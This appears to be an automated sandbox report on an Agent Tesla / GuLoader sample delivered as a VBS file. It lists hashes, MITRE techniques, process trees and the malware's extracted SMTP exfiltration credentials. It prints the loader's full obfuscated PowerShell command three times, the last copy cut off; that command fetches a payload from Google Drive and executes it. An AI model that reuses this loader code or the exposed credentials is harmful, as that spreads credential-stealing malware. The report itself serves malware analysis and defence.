agenttesla | 41a67a39958b99af683c17ac26d30cdce693a10b96e4e95640230e22589ca592

General

Target

Justificante_134790.vbs
Size

19KB
MD5

9de837847e942e100339d463b5e83ea8
SHA1

4a60fd23d3a15619b42755e0248805c66797fbed
SHA256

41a67a39958b99af683c17ac26d30cdce693a10b96e4e95640230e22589ca592
SHA512

ca7307aae1a71ad3ce08f5fd857b8df78139cdd9d990561fd05e9ee6108da3548fbb68a16a536abe1ccbdcd97318e030101fc0da176da6c6336a3aa28ed42297
SSDEEP

384:66Q3GOmBsxCn0r7d8SfLnFW4mDAMnHiQBEiLwO9mvRwPzJ1:K39cs80r/RW4eHJBzwmm5W11

Score

10^/10

agenttesla guloader credential_access discovery downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2784	WScript.exe
5	2620	powershell.exe
7	2620	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
10	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	api.ipify.org
19	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2960	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1232	powershell.exe
2960	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1232 set thread context of 2960	1232	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1232	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2620	powershell.exe
1232	powershell.exe
1232	powershell.exe
2960	wabmig.exe
2960	wabmig.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1232	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	2960	wabmig.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2960	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2784 wrote to memory of 2620	2784	WScript.exe	30
PID 2784 wrote to memory of 2620	2784	WScript.exe	30
PID 2784 wrote to memory of 2620	2784	WScript.exe	30
PID 2620 wrote to memory of 2468	2620	powershell.exe	32
PID 2620 wrote to memory of 2468	2620	powershell.exe	32
PID 2620 wrote to memory of 2468	2620	powershell.exe	32
PID 2620 wrote to memory of 2396	2620	powershell.exe	35
PID 2620 wrote to memory of 2396	2620	powershell.exe	35
PID 2620 wrote to memory of 2396	2620	powershell.exe	35
PID 2396 wrote to memory of 1232	2396	cmd.exe	36
PID 2396 wrote to memory of 1232	2396	cmd.exe	36
PID 2396 wrote to memory of 1232	2396	cmd.exe	36
PID 2396 wrote to memory of 1232	2396	cmd.exe	36
PID 1232 wrote to memory of 2976	1232	powershell.exe	37
PID 1232 wrote to memory of 2976	1232	powershell.exe	37
PID 1232 wrote to memory of 2976	1232	powershell.exe	37
PID 1232 wrote to memory of 2976	1232	powershell.exe	37
PID 1232 wrote to memory of 2960	1232	powershell.exe	38
PID 1232 wrote to memory of 2960	1232	powershell.exe	38
PID 1232 wrote to memory of 2960	1232	powershell.exe	38
PID 1232 wrote to memory of 2960	1232	powershell.exe	38
PID 1232 wrote to memory of 2960	1232	powershell.exe	38
PID 1232 wrote to memory of 2960	1232	powershell.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_134790.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Forarbejdningen Kambal Jordklodernes Kardanakslen #>;$Damageableness='Olietj';<#Angara Enzo Cheliferous #>;$Relatch=$host.PrivateData;If ($Relatch) {$Dentality++;}function Concomitancy2($olearia){$Pneumonic=$olearia.Length-$Dentality;for( $Forladegevrs=4;$Forladegevrs -lt $Pneumonic;$Forladegevrs+=5){$Vbners+=$olearia[$Forladegevrs];}$Vbners;}function Hvsningen($Liturgist){ . ($Outfling) ($Liturgist);}$Ritraad=Concomitancy2 'Dec M GldoHydrzPantiRaa,l.edrldenta Unr/Embo5Reko. eu0 Slu gena(AweeWSleeiWheanPeridSkaro Raaw ,xesKla .okaNGarnTba,y Tal,1Knap0 jk. Hiv0V ss;Thim Cu.iWSjusiFascnu tr6Spil4Un n; Tyr Slu,xAncy6Teno4 co,;Resf ilsr p rv Eu : Sum1 Imp2B,ov1Ve k.,ess0Coro) Lil SornGMismeCarocGal,k G lo P.i/Fa.l2 anx0 Ar,1Incl0Post0Tilb1 Han0 Da,1ag e TropF,nwoiTvrmrReineBla fHun,o Senx B p/Prfa1Lidg2Hyp 1M,ni.Udre0fat ';$Seniorstipendiums=Concomitancy2 ' LasUFalkSB ane reerFunf- ,ogACh bgabu E UndnFanetBeco ';$Sammenrulning=Concomitancy2 ' ZanhFritthelltUncrpbalusRett: Bes/In g/ tardl inrForsi Fi v tu eF en. U,kgMandoDecioStorgArbel ConeSubs. ValcPaleoFilmmSint/TonguTip.cDeli?Iso.eblooxs.mmpHjeroAut.rOutgtInte=jovidAfs,oMitzwDolcnUn el lybosurvaL,nkdHusb&TidliIsskdDomm=Ten,1Pe ic MalPWabbYS ulJ Pre_DkskcBevf4MnemOKlo MGimpfPituvRam.ZS,ndDstruV onywSaetzUdveUHospdUndebBunk4AbscbEfteRFlakSHjem8Chau3Carrpga.sN strtInvaEP trH Unf3 larqPre ';$Andenstyrmanden=Concomitancy2 'Rste>Oms ';$Outfling=Concomitancy2 '.xteiLo.geRaceX.ver ';$Blindstory='Fuldbyrdelsernes';$Unpatriotically = Concomitancy2 '.ovee Blocb,erh lao Afl Remo%B,laa Phep ordpBun dGro,aVerntAntraTigg% K p\ FugVFluoaEd,krPoacmAkade Dipf Af.o Ly.rRel,d Inde.yphlI,skiNatunDanngSpro.L.gaR Gr da.phsSciu j nm&Nong&Aff Essae Nerc,nush ArdoU,pr ForttSejr ';Hvsningen (Concomitancy2 'Ram,$ A,ggforsl JonopassbKataa,perlRadi:P,olCOp.khScatiStamwT,naePietrCic eFlyt=Perm(Udfac SkjmAft dT,et Fuld/PallcMdea Acro$SandUPensnRec p RygaIncrtPortrOo oiD lcoRumitSkruiArb c.kaea istlCupelOmseyene )Ir a ');Hvsningen (Concomitancy2 'Brug$ ,isgB,ltlAnt.oJux bFashaBe ilEnqu:B.goSByrapHyp eRiciaHomokPaakeD scd,dree unsTrin= Adj$UnstSenera ThemVe um Sa eKosmn,uburJequuAn,blDronnUdfoiSem.nIndlgEkl .V.stsBad.pT iflM toiDob tViol( can$SlikAHornn PuldTe ge Chin Lo s SektGallymesorDatomLampak ydn AttdToileTh in Met)Lkke ');Hvsningen (Concomitancy2 'Gran[IndiNbrpleK,nctHuck. orcS udbeSte r,luov muliOps.c NoneHaysPSprto FusiUlyknPapat WorM,micaP lon LanaBehag ole Grir Aff]Hedg:Cara:fingSArbieBib.cDatauOverrAugmi squt eneyNi rPSt drSoraoAbslt rovo .rec DeboEnetlDig Apol=Neph Stan[,iddNTho,eSodotSusl.PrerSTax,eF micBogguDeckrOmdii emmtSki y orP DuorOve.oDiamtVoveoSnkecDokuoPseulPrciT M ryLu,epPoteeS,ff]Befe:F.rl:Deo TFirelGravs art1Indd2Nont ');$Sammenrulning=$Speakedes[0];$Forladegevrsnstigative= (Concomitancy2 'Rekt$ abogNonfl AksO MauBcupuASt rlBu,i:OsciuSammNMorgo RabfPjatfvodkiBla,CPosti,resAT yrL KolDSkalo rudMe ui=KandNUdlae Mo,wNome-KonooFendB .utJTeleE lync nglT,tai RullsDiteyBra sFosst m,nEDiskmNonb.IdenNE.eke,peitTrka.La eWArdeE St.bkabeCP lelForsI laue StinTragT');$Forladegevrsnstigative+=$Chiwere[1];Hvsningen ($Forladegevrsnstigative);Hvsningen (Concomitancy2 ' Piv$MonouEpoknAfnao R tfD,sifstatiMicrcDy kiSyndaBas l OvedNonaoOmismAk i.Sc,nHAarseApica ildKlireunp rAdvisTh.r[Aars$L.msSBydee Fidn M giAnemoOpfyrResesBegat ittiRefepKabae acnMaltd TvriTeknuSvanmaffrsDe.e]Frdi=Eldi$HoveRId niOvertAve.rBeboaUforaAutodBazo ');$theb=Concomitancy2 'Unex$Con.u SaynTrevoLeipf rief SmaiTrevc EnciPropaSk,ilNoncdFaweoKagem Akt.Pat,DDecooturmwadminJ lil Samo D fa RundVettFFroki BhilGolle ove(Buss$Res,SCuriaU damStatm ereAadsnEn.or Boru Elel Samn tariSa,mnTembg E p,Tje $ DiafBrinl F haTesugPu lr ndrd kro)Re a ';$flagrd=$Chiwere[0];Hvsningen (Concomitancy2 'Shah$BarrgChauLOms.o Na BDoddasc.pLPoma: GraPEuglEChemt unjTCab,lSponeToasDBrdl=Teg.( alkt BrkeScalS,oliT Po -ParspTaxiA LivTPhosHCoun neon$ Si FPolyLTingAChicGlaerRPhytDFar )Nose ');while (!$Pettled) {Hvsningen (Concomitancy2 'J de$A plg jerlOsteoM nobMaraa MenlBroo:RgerMPseuiOmd.cpengrInuro,rafsBan.c ldga E tlKaree ott=Pres$Symtt M kr Spou Mi.eGa.r ') ;Hvsningen $theb;Hvsningen (Concomitancy2 ' RanSOldttPhenaPer rShratOver-TwenSDortlRetreEnereZuccp opp dibb4Tusi ');Hvsningen (Concomitancy2 ' Sor$Lageg illDehyo Fo bNon a ReslPrec: acaPOliveDilatMiddtPaualTouceSeddd Int=Pa,h(t,plTSe teGe,asEpimtSpir- DetP Suba esitTow.h For Mo t$Pomaf ral undaI prgFondr InddForb) rmr ') ;Hvsningen (Concomitancy2 ' Vre$Cat gRoselProsoCoarb,iniaOutflOrga:SkieTKoereAan k Ud s ggrtDatalKa.eiKosanUnivjFerve Cys=Flyg$UndegSavelSolio LnpbKlynaCirklCoxo:OrdlA S,otMysttC quiReolcO eriind sGui.mSubc+Skul+Lysn%Anka$RelaSMannp HoreZoftaSta kRgteeAmnedTemeechros Smr.Pretc ,imoT tru lenSynktdier ') ;$Sammenrulning=$Speakedes[$Tekstlinje];}$Adresseberegningers=297474;$Feriefond=27990;Hvsningen (Concomitancy2 'Hawk$UldggInholStreoHanhb C laK oblAnak:U reDSunla LansOkseh forpKapilNoseaStilt HemeUnas Enhe=H mb FrisGJenseGr.vt Psy-NonjCMi,ooReginNonmtMicreH xan arktUdst Cha,$PatefF dslOveraAnt gUndirFaund Hae ');Hvsningen (Concomitancy2 'Ambl$Po ygmed lFor oD,onbhyd aN urlEsch:MiliTStreeRacek calsCurptCypritheflOmpliBr.gnFejldsaniuNat s RegtPlenrRetri poseSalmnArbis Use Stub= Te Nucl[HatrSSlakyGthes lgetProteSoupmUdkl.N,ncCBallo ulrnPedovdrivePla rAkslt,erv] Act:Sals:Ca.eFJowtrMesaoCommmT leBLizzastumsRecreDiff6 Bal4BoobSvilkt,etrrSterich onHyp,gKuld(Begu$N taDHejsaJu,ks fi,hSkydpPilol ameaPal tTo.ae Sil)Sm g ');Hvsningen (Concomitancy2 'Bogk$Lurkgreg l ensoAs rbAngeaKronlC ar: ClapDukke Kaar pvkmNecei DepnT.oggT ec Opst=Sipp Bnn[Ai iSAnkry eldsWarst U vescenmSnne. s cT FreeFlovxHerot U o. rotEHoven skec Bl.o SchdDetaiBliknTr,agSemi]Slav:Deme: BadAMoleSB saCNonfIGiraIStem. SulGDyrlegengtselvSDamptS.rerPergi Skrnscrag Cym(Folk$IsopTVerseGeorkBenzsdksottoboiClapl UndiUno nMatrdBlakuPerls LditBonarCosiimanieRacen NedsO.ot)Bonn ');Hvsningen (Concomitancy2 ' Cir$ spogTjhulP,roo Guyb,esiaTel l Sam:CobbDGener xcu Id k Dann Pl eOpfidKetudProgsIdio= Unc$syripBemjecut rAccemCribi SinnReskg D a.Sys,sfortuGoatbB gmsU,ectGuitrSa diEquan La,gBage( .je$AmaaATsa d AutrBidee Imis Gars rseeEntab Fore edar C reTereg Ca n F ei,rernCo fgBegieFu rrbannsSubs,Katt$Mu cFBergeStonrHaltiTum eCen fDowfoVkstnBethd Dac) G,w ');Hvsningen $Druknedds;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Varmefordeling.Rds && echo t"
    3⤵
    PID:2468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Forarbejdningen Kambal Jordklodernes Kardanakslen #>;$Damageableness='Olietj';<#Angara Enzo Cheliferous #>;$Relatch=$host.PrivateData;If ($Relatch) {$Dentality++;}function Concomitancy2($olearia){$Pneumonic=$olearia.Length-$Dentality;for( $Forladegevrs=4;$Forladegevrs -lt $Pneumonic;$Forladegevrs+=5){$Vbners+=$olearia[$Forladegevrs];}$Vbners;}function Hvsningen($Liturgist){ . ($Outfling) ($Liturgist);}$Ritraad=Concomitancy2 'Dec M GldoHydrzPantiRaa,l.edrldenta Unr/Embo5Reko. eu0 Slu gena(AweeWSleeiWheanPeridSkaro Raaw ,xesKla .okaNGarnTba,y Tal,1Knap0 jk. Hiv0V ss;Thim Cu.iWSjusiFascnu tr6Spil4Un n; Tyr Slu,xAncy6Teno4 co,;Resf ilsr p rv Eu : Sum1 Imp2B,ov1Ve k.,ess0Coro) Lil SornGMismeCarocGal,k G lo P.i/Fa.l2 anx0 Ar,1Incl0Post0Tilb1 Han0 Da,1ag e TropF,nwoiTvrmrReineBla fHun,o Senx B p/Prfa1Lidg2Hyp 1M,ni.Udre0fat ';$Seniorstipendiums=Concomitancy2 ' LasUFalkSB ane reerFunf- ,ogACh bgabu E UndnFanetBeco ';$Sammenrulning=Concomitancy2 ' ZanhFritthelltUncrpbalusRett: Bes/In g/ tardl inrForsi Fi v tu eF en. U,kgMandoDecioStorgArbel ConeSubs. ValcPaleoFilmmSint/TonguTip.cDeli?Iso.eblooxs.mmpHjeroAut.rOutgtInte=jovidAfs,oMitzwDolcnUn el lybosurvaL,nkdHusb&TidliIsskdDomm=Ten,1Pe ic MalPWabbYS ulJ Pre_DkskcBevf4MnemOKlo MGimpfPituvRam.ZS,ndDstruV onywSaetzUdveUHospdUndebBunk4AbscbEfteRFlakSHjem8Chau3Carrpga.sN strtInvaEP trH Unf3 larqPre ';$Andenstyrmanden=Concomitancy2 'Rste>Oms ';$Outfling=Concomitancy2 '.xteiLo.geRaceX.ver ';$Blindstory='Fuldbyrdelsernes';$Unpatriotically = Concomitancy2 '.ovee Blocb,erh lao Afl Remo%B,laa Phep ordpBun dGro,aVerntAntraTigg% K p\ FugVFluoaEd,krPoacmAkade Dipf Af.o Ly.rRel,d Inde.yphlI,skiNatunDanngSpro.L.gaR Gr da.phsSciu j nm&Nong&Aff Essae Nerc,nush ArdoU,pr ForttSejr ';Hvsningen (Concomitancy2 'Ram,$ A,ggforsl JonopassbKataa,perlRadi:P,olCOp.khScatiStamwT,naePietrCic eFlyt=Perm(Udfac SkjmAft dT,et Fuld/PallcMdea Acro$SandUPensnRec p RygaIncrtPortrOo oiD lcoRumitSkruiArb c.kaea istlCupelOmseyene )Ir a ');Hvsningen (Concomitancy2 'Brug$ ,isgB,ltlAnt.oJux bFashaBe ilEnqu:B.goSByrapHyp eRiciaHomokPaakeD scd,dree unsTrin= Adj$UnstSenera ThemVe um Sa eKosmn,uburJequuAn,blDronnUdfoiSem.nIndlgEkl .V.stsBad.pT iflM toiDob tViol( can$SlikAHornn PuldTe ge Chin Lo s SektGallymesorDatomLampak ydn AttdToileTh in Met)Lkke ');Hvsningen (Concomitancy2 'Gran[IndiNbrpleK,nctHuck. orcS udbeSte r,luov muliOps.c NoneHaysPSprto FusiUlyknPapat WorM,micaP lon LanaBehag ole Grir Aff]Hedg:Cara:fingSArbieBib.cDatauOverrAugmi squt eneyNi rPSt drSoraoAbslt rovo .rec DeboEnetlDig Apol=Neph Stan[,iddNTho,eSodotSusl.PrerSTax,eF micBogguDeckrOmdii emmtSki y orP DuorOve.oDiamtVoveoSnkecDokuoPseulPrciT M ryLu,epPoteeS,ff]Befe:F.rl:Deo TFirelGravs art1Indd2Nont ');$Sammenrulning=$Speakedes[0];$Forladegevrsnstigative= (Concomitancy2 'Rekt$ abogNonfl AksO MauBcupuASt rlBu,i:OsciuSammNMorgo RabfPjatfvodkiBla,CPosti,resAT yrL KolDSkalo rudMe ui=KandNUdlae Mo,wNome-KonooFendB .utJTeleE lync nglT,tai RullsDiteyBra sFosst m,nEDiskmNonb.IdenNE.eke,peitTrka.La eWArdeE St.bkabeCP lelForsI laue StinTragT');$Forladegevrsnstigative+=$Chiwere[1];Hvsningen ($Forladegevrsnstigative);Hvsningen (Concomitancy2 ' Piv$MonouEpoknAfnao R tfD,sifstatiMicrcDy kiSyndaBas l OvedNonaoOmismAk i.Sc,nHAarseApica ildKlireunp rAdvisTh.r[Aars$L.msSBydee Fidn M giAnemoOpfyrResesBegat ittiRefepKabae acnMaltd TvriTeknuSvanmaffrsDe.e]Frdi=Eldi$HoveRId niOvertAve.rBeboaUforaAutodBazo ');$theb=Concomitancy2 'Unex$Con.u SaynTrevoLeipf rief SmaiTrevc EnciPropaSk,ilNoncdFaweoKagem Akt.Pat,DDecooturmwadminJ lil Samo D fa RundVettFFroki BhilGolle ove(Buss$Res,SCuriaU damStatm ereAadsnEn.or Boru Elel Samn tariSa,mnTembg E p,Tje $ DiafBrinl F haTesugPu lr ndrd kro)Re a ';$flagrd=$Chiwere[0];Hvsningen (Concomitancy2 'Shah$BarrgChauLOms.o Na BDoddasc.pLPoma: GraPEuglEChemt unjTCab,lSponeToasDBrdl=Teg.( alkt BrkeScalS,oliT Po -ParspTaxiA LivTPhosHCoun neon$ Si FPolyLTingAChicGlaerRPhytDFar )Nose ');while (!$Pettled) {Hvsningen (Concomitancy2 'J de$A plg jerlOsteoM nobMaraa MenlBroo:RgerMPseuiOmd.cpengrInuro,rafsBan.c ldga E tlKaree ott=Pres$Symtt M kr Spou Mi.eGa.r ') ;Hvsningen $theb;Hvsningen (Concomitancy2 ' RanSOldttPhenaPer rShratOver-TwenSDortlRetreEnereZuccp opp dibb4Tusi ');Hvsningen (Concomitancy2 ' Sor$Lageg illDehyo Fo bNon a ReslPrec: acaPOliveDilatMiddtPaualTouceSeddd Int=Pa,h(t,plTSe teGe,asEpimtSpir- DetP Suba esitTow.h For Mo t$Pomaf ral undaI prgFondr InddForb) rmr ') ;Hvsningen (Concomitancy2 ' Vre$Cat gRoselProsoCoarb,iniaOutflOrga:SkieTKoereAan k Ud s ggrtDatalKa.eiKosanUnivjFerve Cys=Flyg$UndegSavelSolio LnpbKlynaCirklCoxo:OrdlA S,otMysttC quiReolcO eriind sGui.mSubc+Skul+Lysn%Anka$RelaSMannp HoreZoftaSta kRgteeAmnedTemeechros Smr.Pretc ,imoT tru lenSynktdier ') ;$Sammenrulning=$Speakedes[$Tekstlinje];}$Adresseberegningers=297474;$Feriefond=27990;Hvsningen (Concomitancy2 'Hawk$UldggInholStreoHanhb C laK oblAnak:U reDSunla LansOkseh forpKapilNoseaStilt HemeUnas Enhe=H mb FrisGJenseGr.vt Psy-NonjCMi,ooReginNonmtMicreH xan arktUdst Cha,$PatefF dslOveraAnt gUndirFaund Hae ');Hvsningen (Concomitancy2 'Ambl$Po ygmed lFor oD,onbhyd aN urlEsch:MiliTStreeRacek calsCurptCypritheflOmpliBr.gnFejldsaniuNat s RegtPlenrRetri poseSalmnArbis Use Stub= Te Nucl[HatrSSlakyGthes lgetProteSoupmUdkl.N,ncCBallo ulrnPedovdrivePla rAkslt,erv] Act:Sals:Ca.eFJowtrMesaoCommmT leBLizzastumsRecreDiff6 Bal4BoobSvilkt,etrrSterich onHyp,gKuld(Begu$N taDHejsaJu,ks fi,hSkydpPilol ameaPal tTo.ae Sil)Sm g ');Hvsningen (Concomitancy2 'Bogk$Lurkgreg l ensoAs rbAngeaKronlC ar: ClapDukke Kaar pvkmNecei DepnT.oggT ec Opst=Sipp Bnn[Ai iSAnkry eldsWarst U vescenmSnne. s cT FreeFlovxHerot U o. rotEHoven skec Bl.o SchdDetaiBliknTr,agSemi]Slav:Deme: BadAMoleSB saCNonfIGiraIStem. SulGDyrlegengtselvSDamptS.rerPergi Skrnscrag Cym(Folk$IsopTVerseGeorkBenzsdksottoboiClapl UndiUno nMatrdBlakuPerls LditBonarCosiimanieRacen NedsO.ot)Bonn ');Hvsningen (Concomitancy2 ' Cir$ spogTjhulP,roo Guyb,esiaTel l Sam:CobbDGener xcu Id k Dann Pl eOpfidKetudProgsIdio= Unc$syripBemjecut rAccemCribi SinnReskg D a.Sys,sfortuGoatbB gmsU,ectGuitrSa diEquan La,gBage( .je$AmaaATsa d AutrBidee Imis Gars rseeEntab Fore edar C reTereg Ca n F ei,rernCo fgBegieFu rrbannsSubs,Katt$Mu cFBergeStonrHaltiTum eCen fDowfoVkstnBethd Dac) G,w ');Hvsningen $Druknedds;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Forarbejdningen Kambal Jordklodernes Kardanakslen #>;$Damageableness='Olietj';<#Angara Enzo Cheliferous #>;$Relatch=$host.PrivateData;If ($Relatch) {$Dentality++;}function Concomitancy2($olearia){$Pneumonic=$olearia.Length-$Dentality;for( $Forladegevrs=4;$Forladegevrs -lt $Pneumonic;$Forladegevrs+=5){$Vbners+=$olearia[$Forladegevrs];}$Vbners;}function Hvsningen($Liturgist){ . ($Outfling) ($Liturgist);}$Ritraad=Concomitancy2 'Dec M GldoHydrzPantiRaa,l.edrldenta Unr/Embo5Reko. eu0 Slu gena(AweeWSleeiWheanPeridSkaro Raaw ,xesKla .okaNGarnTba,y Tal,1Knap0 jk. Hiv0V ss;Thim Cu.iWSjusiFascnu tr6Spil4Un n; Tyr Slu,xAncy6Teno4 co,;Resf ilsr p rv Eu : Sum1 Imp2B,ov1Ve k.,ess0Coro) Lil SornGMismeCarocGal,k G lo P.i/Fa.l2 anx0 Ar,1Incl0Post0Tilb1 Han0 Da,1ag e TropF,nwoiTvrmrReineBla fHun,o Senx B p/Prfa1Lidg2Hyp 1M,ni.Udre0fat ';$Seniorstipendiums=Concomitancy2 ' LasUFalkSB ane reerFunf- ,ogACh bgabu E UndnFanetBeco ';$Sammenrulning=Concomitancy2 ' ZanhFritthelltUncrpbalusRett: Bes/In g/ tardl inrForsi Fi v tu eF en. U,kgMandoDecioStorgArbel ConeSubs. ValcPaleoFilmmSint/TonguTip.cDeli?Iso.eblooxs.mmpHjeroAut.rOutgtInte=jovidAfs,oMitzwDolcnUn el lybosurvaL,nkdHusb&TidliIsskdDomm=Ten,1Pe ic MalPWabbYS ulJ Pre_DkskcBevf4MnemOKlo MGimpfPituvRam.ZS,ndDstruV onywSaetzUdveUHospdUndebBunk4AbscbEfteRFlakSHjem8Chau3Carrpga.sN strtInvaEP trH Unf3 larqPre ';$Andenstyrmanden=Concomitancy2 'Rste>Oms ';$Outfling=Concomitancy2 '.xteiLo.geRaceX.ver ';$Blindstory='Fuldbyrdelsernes';$Unpatriotically = Concomitancy2 '.ovee Blocb,erh lao Afl Remo%B,laa Phep ordpBun dGro,aVerntAntraTigg% K p\ FugVFluoaEd,krPoacmAkade Dipf Af.o Ly.rRel,d Inde.yphlI,skiNatunDanngSpro.L.gaR Gr da.phsSciu j nm&Nong&Aff Essae Nerc,nush ArdoU,pr ForttSejr ';Hvsningen (Concomitancy2 'Ram,$ A,ggforsl JonopassbKataa,perlRadi:P,olCOp.khScatiStamwT,naePietrCic eFlyt=Perm(Udfac SkjmAft dT,et Fuld/PallcMdea Acro$SandUPensnRec p RygaIncrtPortrOo oiD lcoRumitSkruiArb c.kaea istlCupelOmseyene )Ir a ');Hvsningen (Concomitancy2 'Brug$ ,isgB,ltlAnt.oJux bFashaBe ilEnqu:B.goSByrapHyp eRiciaHomokPaakeD scd,dree unsTrin= Adj$UnstSenera ThemVe um Sa eKosmn,uburJequuAn,blDronnUdfoiSem.nIndlgEkl .V.stsBad.pT iflM toiDob tViol( can$SlikAHornn PuldTe ge Chin Lo s SektGallymesorDatomLampak ydn AttdToileTh in Met)Lkke ');Hvsningen (Concomitancy2 'Gran[IndiNbrpleK,nctHuck. orcS udbeSte r,luov muliOps.c NoneHaysPSprto FusiUlyknPapat WorM,micaP lon LanaBehag ole Grir Aff]Hedg:Cara:fingSArbieBib.cDatauOverrAugmi squt eneyNi rPSt drSoraoAbslt rovo .rec DeboEnetlDig Apol=Neph Stan[,iddNTho,eSodotSusl.PrerSTax,eF micBogguDeckrOmdii emmtSki y orP DuorOve.oDiamtVoveoSnkecDokuoPseulPrciT M ryLu,epPoteeS,ff]Befe:F.rl:Deo TFirelGravs art1Indd2Nont ');$Sammenrulning=$Speakedes[0];$Forladegevrsnstigative= (Concomitancy2 'Rekt$ abogNonfl AksO MauBcupuASt rlBu,i:OsciuSammNMorgo RabfPjatfvodkiBla,CPosti,resAT yrL KolDSkalo rudMe ui=KandNUdlae Mo,wNome-KonooFendB .utJTeleE lync nglT,tai RullsDiteyBra sFosst m,nEDiskmNonb.IdenNE.eke,peitTrka.La eWArdeE St.bkabeCP lelForsI laue StinTragT');$Forladegevrsnstigative+=$Chiwere[1];Hvsningen ($Forladegevrsnstigative);Hvsningen (Concomitancy2 ' Piv$MonouEpoknAfnao R tfD,sifstatiMicrcDy kiSyndaBas l OvedNonaoOmismAk i.Sc,nHAarseApica ildKlireunp rAdvisTh.r[Aars$L.msSBydee Fidn M giAnemoOpfyrResesBegat ittiRefepKabae acnMaltd TvriTeknuSvanmaffrsDe.e]Frdi=Eldi$HoveRId niOvertAve.rBeboaUforaAutodBazo ');$theb=Concomitancy2 'Unex$Con.u SaynTrevoLeipf rief SmaiTrevc EnciPropaSk,ilNoncdFaweoKagem Akt.Pat,DDecooturmwadminJ lil Samo D fa RundVettFFroki BhilGolle ove(Buss$Res,SCuriaU damStatm ereAadsnEn.or Boru Elel Samn tariSa,mnTembg E p,Tje $ DiafBrinl F haTesugPu lr ndrd kro)Re a ';$flagrd=$Chiwere[0];Hvsningen (Concomitancy2 'Shah$BarrgChauLOms.o Na BDoddasc.pLPoma: GraPEuglEChemt unjTCab,lSponeToasDBrdl=Teg.( alkt BrkeScalS,oliT Po -ParspTaxiA LivTPhosHCoun neon$ Si FPolyLTingAChicGlaerRPhytDFar )Nose ');while (!$Pettled) {Hvsningen (Concomitancy2 'J de$A plg jerlOsteoM nobMaraa MenlBroo:RgerMPseuiOmd.cpengrInuro,rafsBan.c ldga E tlKaree ott=Pres$Symtt M kr Spou Mi.eGa.r ') ;Hvsningen $theb;Hvsningen (Concomitancy2 ' RanSOldttPhenaPer rShratOver-TwenSDortlRetreEnereZuccp opp dibb4Tusi ');Hvsningen (Concomitancy2 ' Sor$Lageg illDehyo Fo bNon a ReslPrec: acaPOliveDilatMiddtPaualTouceSeddd Int=Pa,h(t,plTSe teGe,asEpimtSpir- DetP Suba esitTow.h For Mo t$Pomaf ral undaI prgFondr InddForb) rmr ') ;Hvsningen (Concomitancy2 ' Vre$Cat gRoselProsoCoarb,iniaOutflOrga:SkieTKoereAan k Ud s ggrtDatalKa.eiKosanUnivjFerve Cys=Flyg$UndegSavelSolio LnpbKlynaCirklCoxo:OrdlA S,otMysttC quiReolcO eriind sGui.mSubc+Skul+Lysn%Anka$RelaSMannp HoreZoftaSta kRgteeAmnedTemeechros Smr.Pretc ,imoT tru lenSynktdier ') ;$Sammenrulning=$Speakedes[$Tekstlinje];}$Adresseberegningers=297474;$Feriefond=27990;Hvsningen (Concomitancy2 'Hawk$UldggInholStreoHanhb C laK oblAnak:U reDSunla LansOkseh forpKapilNoseaStilt HemeUnas Enhe=H mb FrisGJenseGr.vt Psy-NonjCMi,ooReginNonmtMicreH xan arktUdst Cha,$PatefF dslOveraAnt gUndirFaund Hae ');Hvsningen (Concomitancy2 'Ambl$Po ygmed lFor oD,onbhyd aN urlEsch:MiliTStreeRacek calsCurptCypritheflOmpliBr.gnFejldsaniuNat s RegtPlenrRetri 